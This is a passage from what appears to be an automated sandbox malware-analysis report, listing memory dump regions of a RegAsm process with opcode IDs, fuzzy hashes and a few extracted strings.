                                                                            • Instruction Fuzzy Hash: 5AE0E5302007555FC311AB2DF90979E7BEADF81318F04052DD14687A94CBB9AC498791
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd4c9fb4c098c6010330f5cbfe59c70cfb920acefedab56280c0de5d44543f81
                                                                            • Instruction ID: 30f65af9e991e03623bd48642beb8bf07c306e43987a320ce40c8434b76d39d9
                                                                            • Opcode Fuzzy Hash: fd4c9fb4c098c6010330f5cbfe59c70cfb920acefedab56280c0de5d44543f81
                                                                            • Instruction Fuzzy Hash: C7E0D87130B2815FC702AB2CF5A41DC7F60DF66234B07809AC084C7E42C7380C4AC792
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f3f25bd20c6fb54c916dcfaea61bafd085679dfd9b36f396d792b3c762174ec
                                                                            • Instruction ID: d14f7bd08b8ff129c780ed80cc88c611b27430ced7460a274e43f95def3f1b09
                                                                            • Opcode Fuzzy Hash: 4f3f25bd20c6fb54c916dcfaea61bafd085679dfd9b36f396d792b3c762174ec
                                                                            • Instruction Fuzzy Hash: 3CE0D8B16063519FC702EB18FF555883BE5EB9A620B03019AC8404FAB5C73C5D99C7E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ef515e27be5e3d769314b73981b1ae902580cdef209d029939a96a2a2de83612
                                                                            • Instruction ID: 9a747356dc7f95956de053488b6087aab634dc4a13f8da96924a6151b411b014
                                                                            • Opcode Fuzzy Hash: ef515e27be5e3d769314b73981b1ae902580cdef209d029939a96a2a2de83612
                                                                            • Instruction Fuzzy Hash: 7BF039B0E01208EFCB54EFA8E844BADB7B0EB44700F1081A8D80497390EB795D40CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6559df5c0f1df16898601a2825f54871acd0e68ce2d3ab675530fd3e1ac844c
                                                                            • Instruction ID: 888eb872366eccfa917230ba5430800964fce932bcd7b24ce421262d0659711a
                                                                            • Opcode Fuzzy Hash: e6559df5c0f1df16898601a2825f54871acd0e68ce2d3ab675530fd3e1ac844c
                                                                            • Instruction Fuzzy Hash: 3DE0DFB1A4A248EFCB02CF68FA409DD3BB5DB46200B2041EBD808EB2E1E6704F159752
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1ccc18f8c0b2e730e1c1452041cb036afa15e9710f7d1b55e1c331db72cbb161
                                                                            • Instruction ID: bd5b7f5901ec8d5fc554656940829e1ab38e139c42d787abdd92e526024df8f5
                                                                            • Opcode Fuzzy Hash: 1ccc18f8c0b2e730e1c1452041cb036afa15e9710f7d1b55e1c331db72cbb161
                                                                            • Instruction Fuzzy Hash: 53D05E36700218778B142A6AA8058EFBB9FDBD9671705C026F909C3610DE799852D2E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 578c271eac55a5119f164dff06f12552b3bc382d49a9025bc39b6579ce63ca9f
                                                                            • Instruction ID: 89949a9722dac8aa34807a1ff92ff1561025b24413e187e585377986e95b45ba
                                                                            • Opcode Fuzzy Hash: 578c271eac55a5119f164dff06f12552b3bc382d49a9025bc39b6579ce63ca9f
                                                                            • Instruction Fuzzy Hash: 06E08CB13109125BCB1A2728B0584BE7FEAFFC9621312822EE14AC3B40CE3C19068781
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b3857defd956f771d765e20e51f738e83617c71d6656898c368ccaca443eb4d6
                                                                            • Instruction ID: c81ea08d42f13820bc613b952ce0d7efc88064668f2331bbed2fe1e13d06ac1b
                                                                            • Opcode Fuzzy Hash: b3857defd956f771d765e20e51f738e83617c71d6656898c368ccaca443eb4d6
                                                                            • Instruction Fuzzy Hash: 66D0C2B131041457C6092629B4084AE37DEEAC5621302422AE10AC3B40CE2C280683D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2204be5caa8304ffb09b549aab84ab1edfbde7a7900ad3034089102f77b38881
                                                                            • Instruction ID: cd078e7b386c7dc6226913b01045bd6fb1785d524779997460f0bb965f1d33d0
                                                                            • Opcode Fuzzy Hash: 2204be5caa8304ffb09b549aab84ab1edfbde7a7900ad3034089102f77b38881
                                                                            • Instruction Fuzzy Hash: 3CE07E79D0020CFFCB41DFA4E9458DDBBB9EB48200F5082AAD809A3240EA746B959B80
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11e8cc9fc67d816b777dd1e3a35cb2cac2526a09e73c2fb8127c3bad5b2da397
                                                                            • Instruction ID: e48c36fe41ef124509f932b55291916ace7f38688c8fa456b9ed8d2cfa8761e3
                                                                            • Opcode Fuzzy Hash: 11e8cc9fc67d816b777dd1e3a35cb2cac2526a09e73c2fb8127c3bad5b2da397
                                                                            • Instruction Fuzzy Hash: C4D017B1A02208FFCB00DFA8EA0599DB7B9EB44214B5045AD9408F7250EA316E049B91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8ed1f46db36e8656e95809246702d647609b4cf59db5436600ed3c13cedf6697
                                                                            • Instruction ID: 562fbe3238bbe6727102a61f782307059189dee6fafd4e638bcee979be35ae79
                                                                            • Opcode Fuzzy Hash: 8ed1f46db36e8656e95809246702d647609b4cf59db5436600ed3c13cedf6697
                                                                            • Instruction Fuzzy Hash: C3C012B27040514B4345666C705406D7BD7D7DC5A33A9416FD70DD7388DE704C564785
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f2cde6f1152f01f5339e892e357dae904f4700c330a3e787d54a25a54f5cde8d
                                                                            • Instruction ID: 61e09abb4da108120fe0ddfcf2d50bde175a612973ddd2ceb42f35e7db537b2e
                                                                            • Opcode Fuzzy Hash: f2cde6f1152f01f5339e892e357dae904f4700c330a3e787d54a25a54f5cde8d
                                                                            • Instruction Fuzzy Hash: 1FC08C3000A3803FCB026624AD02DE77F6BAB56B00F0A0182F3818A0A383650A38D3B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 481a2db332d2d97e415deb3d9142c543a57b2278892c25b27d94b66415f1620a
                                                                            • Instruction ID: 5b0fad79d7fb0ad5f27af8045e00f93c75541c103c367e79f2586879260d2397
                                                                            • Opcode Fuzzy Hash: 481a2db332d2d97e415deb3d9142c543a57b2278892c25b27d94b66415f1620a
                                                                            • Instruction Fuzzy Hash: 89C01235210108EFC740DF54D440C943B79BF487107404085F5444F631C732E810DB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf81d6e8626c98955923d90005f7ec899d15137b314f5ea82be49f64a0b67b62
                                                                            • Instruction ID: 9fe68578960da7fa5beda8faa40f395ae2f4455b935a7dd9edeae13dbd261aa1
                                                                            • Opcode Fuzzy Hash: bf81d6e8626c98955923d90005f7ec899d15137b314f5ea82be49f64a0b67b62
                                                                            • Instruction Fuzzy Hash: 3AC00236260208EFCB41EF99D844C557BB9BF59B147509099FA454F631C732E921EB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q
                                                                            • API String ID: 0-127220927
                                                                            • Opcode ID: 69ae5b4d50773570137f9ada01991f14b7b941923261e50cb2b50fde3abfd697
                                                                            • Instruction ID: ba67d5d987b7938b757b5525c6790ce758e52998d053feb4f1f511f84c253fb1
                                                                            • Opcode Fuzzy Hash: 69ae5b4d50773570137f9ada01991f14b7b941923261e50cb2b50fde3abfd697
                                                                            • Instruction Fuzzy Hash: E061CE74E00208DFDB54DFA9D880ADDBBB2BF89300F64912AE505BB364DB35A946CF50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VOi
                                                                            • API String ID: 0-2334242610
                                                                            • Opcode ID: 1caf293d45321b1c153875d91a4638dc1736799c408c037f6e3d2312a83bfd5f
                                                                            • Instruction ID: 3aa93ebe79f4c642da436276e7c0a32d8fea54111471d530ea330fbc50911c57
                                                                            • Opcode Fuzzy Hash: 1caf293d45321b1c153875d91a4638dc1736799c408c037f6e3d2312a83bfd5f
                                                                            • Instruction Fuzzy Hash: 19917CB0E003098FDF54EFB9D99179DBBF2AF89308F249529E414AB254EB749845CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4d6fafd576f1ff700020abe0f2390098c6e4a1a32a93dfbb372acff3aaa83452
                                                                            • Instruction ID: 208e86120f5743416d630e937759e7c66485bf8b008ba392513ed2e1c0af2ea8
                                                                            • Opcode Fuzzy Hash: 4d6fafd576f1ff700020abe0f2390098c6e4a1a32a93dfbb372acff3aaa83452
                                                                            • Instruction Fuzzy Hash: D76220F06002019FD749EF19D55471A7ADAEF95308F24C46C810E8F3A6DBBAD90BCB96
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 851d40a8d20af4b872c8f7cab5ae0218e29137ecc4cfbb8ccb016ca90509451f
                                                                            • Instruction ID: 7732004c3308dc7b642819233e70c6d16fe5359c9a6c06c52a1b51125f2a89fa
                                                                            • Opcode Fuzzy Hash: 851d40a8d20af4b872c8f7cab5ae0218e29137ecc4cfbb8ccb016ca90509451f
                                                                            • Instruction Fuzzy Hash: 076221F06002019FD749EF19D55471A7ADAEF95308F24C46C810E8F3A6DBBAD90BCB96
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b362d124e119e9dcf25011851e51a2543b953b5a8695853b4e9a4454309e9ea0
                                                                            • Instruction ID: 3d6561de67538cb81a199fc47da9a1a2c2151b421ea78ffef00c430eb0c915be
                                                                            • Opcode Fuzzy Hash: b362d124e119e9dcf25011851e51a2543b953b5a8695853b4e9a4454309e9ea0
                                                                            • Instruction Fuzzy Hash: A81291B04127468EE320EF65FC4C1A97BB9BB86318F904609D2656F2F9DBBC154ACF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0584a9f76718e2ae56ba303c19f66cb0abdf52d6660865605d22e9c3fe12708a
                                                                            • Instruction ID: 22a2d49ae73295cc2f64ea0ddb47a4f257b7beeb0876c57af99aed89c78a24f7
                                                                            • Opcode Fuzzy Hash: 0584a9f76718e2ae56ba303c19f66cb0abdf52d6660865605d22e9c3fe12708a
                                                                            • Instruction Fuzzy Hash: 6CA16D32E4020A8FCF05DFB8C84459EBBB6FFC4300B55456AE906AF265DB75E945CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5b8bfc99e95d0509c26451d8a52cb7e5ccbf703a5834974e6a7f7f1549106f8
                                                                            • Instruction ID: 6b4ebe5bdc709c8afffc184457e5a5f479825e6ca6a13cf890c67b962a31c088
                                                                            • Opcode Fuzzy Hash: c5b8bfc99e95d0509c26451d8a52cb7e5ccbf703a5834974e6a7f7f1549106f8
                                                                            • Instruction Fuzzy Hash: 2FD125B04127468FD720EF28EC481997BB9BB87328F654619D1616F2F9DBBC148ACF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e619aba7cba30667229da6692cecefe18e7e6e0fa8910a2b0e1760b3ea1166df
                                                                            • Instruction ID: cdb3b6252f64e0b0a1c7aac1827cae571377b5bedb08d524904a9ee50be63d2f
                                                                            • Opcode Fuzzy Hash: e619aba7cba30667229da6692cecefe18e7e6e0fa8910a2b0e1760b3ea1166df
                                                                            • Instruction Fuzzy Hash: AF91B470E01229CFDB68DFA5C950B9EBBB2BF89300F5081AAC509AB254DB355E85CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5726f308d317347083b94574f1c3d60a3f8d951742f5dbafde40792db6a4fe7b
                                                                            • Instruction ID: e1c8eabe53978667579cf4677fc25fe2d436bea0d1e9a0e9c0612b06420b5351
                                                                            • Opcode Fuzzy Hash: 5726f308d317347083b94574f1c3d60a3f8d951742f5dbafde40792db6a4fe7b
                                                                            • Instruction Fuzzy Hash: 12017834E05308CFCB11DFA4E8409EDB7B0FB4A312F106296E41AAB2A2C3319D55CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 57fe4e398414cd84f4a4f82b10bc1f434e9073549e304661c7ce17a33822a0ee
                                                                            • Instruction ID: b301d5db183a16b24a9974305d70fe8c279df19057b930ee7445696c7a6e7f2b
                                                                            • Opcode Fuzzy Hash: 57fe4e398414cd84f4a4f82b10bc1f434e9073549e304661c7ce17a33822a0ee
                                                                            • Instruction Fuzzy Hash: 54E09B30C8620EDEE7549F75D0117FFF6306B41218F106455840677248CB7046458F97
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0109d334d6b8801abc6adfb55fcfd8e6a800713f463e589e2c36bdc1f3a73026
                                                                            • Instruction ID: 99466191288b901c421e2bae64000d72c965990fbd3e404ca5c0fffb3e066fac
                                                                            • Opcode Fuzzy Hash: 0109d334d6b8801abc6adfb55fcfd8e6a800713f463e589e2c36bdc1f3a73026
                                                                            • Instruction Fuzzy Hash: 22F0A570C86219CEEB64AF64E8487FABE70AB46B09F206055D01677290C7B44684DFC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-626374656
                                                                            • Opcode ID: e1eb63b311e66caeeaf085698b53c1aeeaea61af922102c8140ef8ecfda7faf9
                                                                            • Instruction ID: edb4d38bc608797192d8322f258047cf110696e5f39d511e130873400d7e474a
                                                                            • Opcode Fuzzy Hash: e1eb63b311e66caeeaf085698b53c1aeeaea61af922102c8140ef8ecfda7faf9
                                                                            • Instruction Fuzzy Hash: B0D1A1703006036BE206AAB9A951E7DA65BFFD5700B44883DC1198F7A9DF756C1E83C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-626374656
                                                                            • Opcode ID: 54ff750a03c0e38b98cd4c3048c07edca121687ba9fee36243062af73cba8183
                                                                            • Instruction ID: 8002346905c95b704ad214c0063e402000e08a10cd52956bae82ac6d71dfcc8a
                                                                            • Opcode Fuzzy Hash: 54ff750a03c0e38b98cd4c3048c07edca121687ba9fee36243062af73cba8183
                                                                            • Instruction Fuzzy Hash: BCD1AE303006036BE20AAABAA951E7DA55BFFD5704B44883DC1198F7A8DF756C1E83C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1209774835
                                                                            • Opcode ID: 168d33c869e0716e3e5d8cab239bd6b7974a8e89c5fb15f436b17a9b3b4a32dc
                                                                            • Instruction ID: 60152f3b1bf4bd856518cb19c3ba1f962fc8ba1cf6af2d9a60e66809474c1ccb
                                                                            • Opcode Fuzzy Hash: 168d33c869e0716e3e5d8cab239bd6b7974a8e89c5fb15f436b17a9b3b4a32dc
                                                                            • Instruction Fuzzy Hash: CA41D9703002032BE3066AB9A951E3DA65EFFD5600B40493DD20D8F6A9DF796D1E83DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1209774835
                                                                            • Opcode ID: a4736636e3e4d71143232adb04f0cb0afb041d781125bef8922afcb923525189
                                                                            • Instruction ID: 3bfcb26f51be79a6ea32a696090bbbe9bfcfc97368a96216ca468d69cec319ef
                                                                            • Opcode Fuzzy Hash: a4736636e3e4d71143232adb04f0cb0afb041d781125bef8922afcb923525189
                                                                            • Instruction Fuzzy Hash: C841C6703006032BE206AAB9A951E3DA55EFFD5700B40893DD20D8F6A9CF796D1D83DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1477724378
                                                                            • Opcode ID: 1dced376082c4adcf8f030f84e6383066e1ecd7e7079271f5f97b5fa2c1d7544
                                                                            • Instruction ID: 3097c54948c4bce1a0e3197ba93d72e2dfe5a1a431bf83dcbec902a791e9b652
                                                                            • Opcode Fuzzy Hash: 1dced376082c4adcf8f030f84e6383066e1ecd7e7079271f5f97b5fa2c1d7544
                                                                            • Instruction Fuzzy Hash: EB31D6703002032BE2065AB9A941A7DAA5EFFD5604B40493DD10D8F6A9CF756C5E83DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-1477724378
                                                                            • Opcode ID: e712d968d318e9f15bbb6c3305a9dbae7296ea6686893485159699cbf2c69c95
                                                                            • Instruction ID: 2d5a3e2b3714a9171b83f881e3755f00a8b28ceda5bb8bbb0bb5045b2516d711
                                                                            • Opcode Fuzzy Hash: e712d968d318e9f15bbb6c3305a9dbae7296ea6686893485159699cbf2c69c95
                                                                            • Instruction Fuzzy Hash: 5421B8703002032BE606AAA9A941E3DA65EFFD5704B40493DD20D8F6ADCF756C5D83DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3632686342
                                                                            • Opcode ID: d95364d3b777fb2fa2d9ca21d6c6f6abf2050ed2d877a6eb63574004ee1b4b1d
                                                                            • Instruction ID: 0098c14a82a77d22d930b6d598b92414c47e382c7a7137d04c3d4afc1d601ee2
                                                                            • Opcode Fuzzy Hash: d95364d3b777fb2fa2d9ca21d6c6f6abf2050ed2d877a6eb63574004ee1b4b1d
                                                                            • Instruction Fuzzy Hash: 9531F4303012836BEB061BA5AD4587DBB2AFF96700740413CD10A8FAA8CE745D5FC782
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3632686342
                                                                            • Opcode ID: d7131e72c4e2e35afcd6ab963f89cba0c1fd0ed109fe00277fc04e8d17b5dca1
                                                                            • Instruction ID: 40d77407bca8f7a828fa41e02aebc9980a52364db606c861a2d2de01b87fd748
                                                                            • Opcode Fuzzy Hash: d7131e72c4e2e35afcd6ab963f89cba0c1fd0ed109fe00277fc04e8d17b5dca1
                                                                            • Instruction Fuzzy Hash: 6F21A230300287ABEB062BA6E94587DBB5AFF95700740453CD10A8F6A8CE745D5FCB86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3147682437
                                                                            • Opcode ID: 2f7e2bd094dafd7ec89a235ce0c997539703621dc30e3a475c06a467bdaf3a6e
                                                                            • Instruction ID: 5b020f50c06d9f2db34e78ee759f361b5e2e5775b28fa13b530656fd5d8fe8fd
                                                                            • Opcode Fuzzy Hash: 2f7e2bd094dafd7ec89a235ce0c997539703621dc30e3a475c06a467bdaf3a6e
